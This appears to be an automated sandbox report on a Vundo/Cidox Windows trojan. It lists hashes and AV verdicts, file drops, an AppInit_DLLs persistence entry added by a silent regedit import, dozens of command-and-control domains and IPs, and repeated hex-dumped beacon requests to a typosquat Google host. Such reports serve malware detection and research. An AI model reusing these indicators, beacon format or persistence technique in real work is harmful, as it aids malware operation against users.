Analysis Date2015-01-17 15:02:54
MD5a24296c7a915555965ff0f0b31d5de61
SHA1ec6f9756634ae54910dadf11af6f9496d5e26574

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 27968d52d43fe02a838adc5707db3948 sha1: 5cb63ab00e691466007ff7865e3d8a8b2b736561 size: 133120
SectionDATA md5: 2ce4f7ffebb7171e0539bde56bbde75d sha1: df971512f9b9e78bb3870f8e0d41e108651cd0b7 size: 8192
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 2023cd19702acde992c16e1d649ba189 sha1: 863179311b64c35e6ff334a3ff22b607502d7a3b size: 1536
Section.reloc md5: 244d08a4778656d4908ffe859a3d590a sha1: 999526cb7f944e127f7e5954e7469134d0e9ca09 size: 6656
Section.rsrc md5: f5232a565223c214e120c5ed5bec877a sha1: c1434e77752057db4f658a40e8334df8731ae7d6 size: 3584
Timestamp1992-06-19 22:22:17
PEhash7c685815054b0887b4c0c1294115e8eca434a865
IMPhashdb96365909b1f8da7ec3e3472777fb57
AV360 Safeno_virus
AVAd-AwareTrojan.Vundo.GYW
AVAlwil (avast)Vundo-ACX [Trj]
AVArcabit (arcavir)Trojan.Vundo.GYW
AVAuthentiumW32/Vundo.JJFR-7586
AVAvira (antivir)TR/Drop.Vundo.V.815
AVBullGuardTrojan.Vundo.GYW
AVCA (E-Trust Ino)Win32/Vundo.IBS
AVCAT (quickheal)Backdoor.Cidox.qkh.cw6
AVClamAVno_virus
AVDr. WebTrojan.LoadMoney.225
AVEmsisoftTrojan.Vundo.GYW
AVEset (nod32)Win32/Citirevo.AE
AVFortinetW32/Cidox.AE!tr
AVFrisk (f-prot)W32/Vundo.CY
AVF-SecureTrojan.Vundo.GYW
AVGrisoft (avg)BackDoor.Generic16.YPM
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Trojan ( 003f15571 )
AVKasperskyBackdoor.Win32.Cidox.qkh
AVMalwareBytesSpyware.Zeus
AVMcafeeGeneric.oa
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.AA
AVMicroWorld (escan)Trojan.Vundo.GYW
AVRisingno_virus
AVSophosTroj/Mdrop-ETG
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_SPNR.2DAI13
AVVirusBlokAda (vba32)Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates FileC:\WINDOWS\system32\tyabizk.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSdetoxist.com
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNSgeostepster.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSnetrovad.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSdegoog1etag.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\tyabizk.dll\\x00

Network Details:

DNSgeostepster.com
Type: A
208.73.211.250
DNSgeostepster.com
Type: A
208.73.210.211
DNSgeostepster.com
Type: A
208.73.211.167
DNSgeostepster.com
Type: A
208.73.211.244
DNSdetoxist.com
Type: A
209.222.14.3
DNSdebijonda.com
Type: A
209.99.40.223
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
209.222.14.3
DNSvornedix.com
Type: A
209.222.14.3
DNSdentagod.com
Type: A
209.222.14.3
DNSliteworns.com
Type: A
209.222.14.3
DNSvengibit.com
Type: A
209.222.14.3
DNStryangets.com
Type: A
209.222.14.3
DNSgetintsu.com
Type: A
109.234.109.82
DNSinzavora.com
Type: A
109.234.109.76
DNSdegoog1etag.com
Type: A
DNSgetinball.com
Type: A
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsegjfS0r5fn9B
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsegjfS0r5fn9B
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsegvQknwL5UMn
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsegXjLhHRtWjQ
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsegXjLhHRtWjQ
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsemF4tWOLXkVe
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsemF4tWOLXkVe
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsepXPNSVxv7jD
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsehqF+DdlHLcK
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsehqF+DdlHLcK
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsehqF+DdlHLcK
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NsehqF+DdlHLcK
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=2577&av=0&vm=0&al=0&p=557&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg40rY1cM9uWaTJG2FvBcdIWQn/Ss73NseivBASXIP+4m
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.211.250:80
Flows TCP192.168.1.1:1032 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1033 ➝ 209.99.40.223:80
Flows TCP192.168.1.1:1034 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1035 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1036 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1038 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1039 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1040 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1041 ➝ 109.234.109.82:80
Flows TCP192.168.1.1:1042 ➝ 109.234.109.76:80
Flows TCP192.168.1.1:1043 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736567 6a665330 7235666e 39422048   NsegjfS0r5fn9B H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736567 6a665330 7235666e 39422048   NsegjfS0r5fn9B H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736567 76516b6e 774c3555 4d6e2048   NsegvQknwL5UMn H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736567 586a4c68 48527457 6a512048   NsegXjLhHRtWjQ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736567 586a4c68 48527457 6a512048   NsegXjLhHRtWjQ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e73656d 46347457 4f4c586b 56652048   NsemF4tWOLXkVe H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e73656d 46347457 4f4c586b 56652048   NsemF4tWOLXkVe H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736570 58504e53 56787637 6a442048   NsepXPNSVxv7jD H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736568 71462b44 646c484c 634b2048   NsehqF+DdlHLcK H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736568 71462b44 646c484c 634b2048   NsehqF+DdlHLcK H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736568 71462b44 646c484c 634b2048   NsehqF+DdlHLcK H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
0x000000b0 (00176)   47324676 42636449 57516e2f 53733733   G2FvBcdIWQn/Ss73
0x000000c0 (00192)   4e736568 71462b44 646c484c 634b2048   NsehqF+DdlHLcK H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35373726   XX0000&key=2577&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 30725931 634d3975 5761544a   Wyg40rY1cM9uWaTJ
